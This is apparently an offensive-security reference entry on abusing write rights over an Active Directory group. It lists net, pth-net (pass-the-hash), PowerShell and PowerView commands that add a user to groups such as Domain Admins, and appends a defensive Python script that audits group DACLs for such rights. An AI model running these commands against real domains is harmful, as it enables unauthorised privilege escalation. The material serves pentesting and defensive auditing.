AddMember
This abuse can be carried out when controlling an object that has AllExtendedRights, Self, WriteProperty, GenericWrite or GenericAll over a target group.
UNIX-like
It can also be achieved from a UNIX-like system with net, a tool for the administration of Samba and CIFS/SMB clients. The pth-toolkit can also be used to run net commands with pass-the-hash.

# With net and cleartext credentials (will be prompted)
net rpc group addmem $TargetGroup $TargetUser -U $DOMAIN/$ControlledUser -S $DomainController

# With net and cleartext credentials
net rpc group addmem $TargetGroup $TargetUser -U $DOMAIN/$ControlledUser%$Password -S $DomainController

# With Pass-the-Hash
pth-net rpc group addmem $TargetGroup $TargetUser -U $DOMAIN/$ControlledUser%ffffffffffffffffffffffffffffffff:$NThash -S $DomainController

Windows
The attacker can add a user/group/computer to a group. This can be achieved with a native command line, with the Active Directory PowerShell module, or with Add-DomainGroupMember (PowerView module).

# Command line
net group 'Domain Admins' 'user' /add /domain

# PowerShell: Active Directory module
Add-ADGroupMember -Identity 'Domain Admins' -Members 'user'

# PowerShell: PowerSploit module
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'user'
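
To audit for the rights listed at the top of this page, the following added example (not part of the original page) parses a group's DACL in SDDL form and reports trustees whose allow ACEs permit editing membership. The sample SDDL, the domain SID, the placeholder attribute GUID and the `expected` trustee allow-list are constructed assumptions.

```python
import re

# schemaIDGUID of the "member" attribute; the Self-Membership validated write shares it.
MEMBER_GUID = "bf9679c0-0de6-11d0-a285-00aa003049e2"
# SDDL rights code -> (right name as used on this page, access-mask bit)
RIGHTS = {"GA": ("GenericAll", 0x10000000), "GW": ("GenericWrite", 0x40000000),
          "WP": ("WriteProperty", 0x20), "SW": ("Self", 0x8),
          "CR": ("AllExtendedRights", 0x100)}
DOM = "S-1-5-21-1111111111-2222222222-3333333333"  # constructed domain SID
# Constructed DACL of a privileged group (not taken from a real directory).
SAMPLE_SDDL = (
    "O:DAG:DAD:PAI"
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;DA)"      # Domain Admins: expected trustee
    "(A;;RPLCLORC;;;AU)"                        # read-only
    f"(OA;;WP;{MEMBER_GUID};;{DOM}-1104)"       # write on 'member'
    f"(OA;CIIO;WP;{MEMBER_GUID};;{DOM}-1105)"   # inherit-only: not the group itself
    f"(OA;;WP;00000000-0000-0000-0000-000000000001;;{DOM}-1106)"  # other attribute (placeholder GUID)
    f"(A;;0x20028;;;{DOM}-1107)"                # hex mask: READ_CONTROL | WP | SW
)

def _pairs(text):  # split an SDDL flag/rights string into two-letter codes
    return {text[i:i + 2] for i in range(0, len(text), 2)}

def risky_aces(sddl, expected=("DA", "EA", "BA", "SY")):
    """Return [(trustee, [rights])] for allow ACEs that permit editing membership."""
    findings = []
    for ace in re.findall(r"\(([^()]*)\)", sddl):
        fields = ace.split(";")
        if len(fields) < 6:
            continue
        ace_type, flags, rights, obj_guid, _inherit_guid, trustee = fields[:6]
        # Keep allow ACEs that apply to the group itself; deny ACEs are not evaluated.
        if ace_type not in ("A", "OA") or "IO" in _pairs(flags) or trustee in expected:
            continue
        if rights.lower().startswith("0x"):
            codes = {c for c, (_n, bit) in RIGHTS.items() if int(rights, 16) & bit}
        else:
            codes = _pairs(rights) & RIGHTS.keys()
        guid = obj_guid.lower()
        hits = [RIGHTS[c][0] for c in sorted(codes)
                if c in ("GA", "GW")                                  # generic rights
                or (c in ("WP", "SW") and guid in ("", MEMBER_GUID))  # all attributes or 'member'
                or (c == "CR" and guid == "")]                        # all extended rights
        if hits:
            findings.append((trustee, hits))
    return findings

if __name__ == "__main__":
    print(*risky_aces(SAMPLE_SDDL), sep="\n")
```

For a real group, the SDDL string can be exported with `(Get-Acl "AD:\<group DN>").Sddl` from the Active Directory PowerShell module.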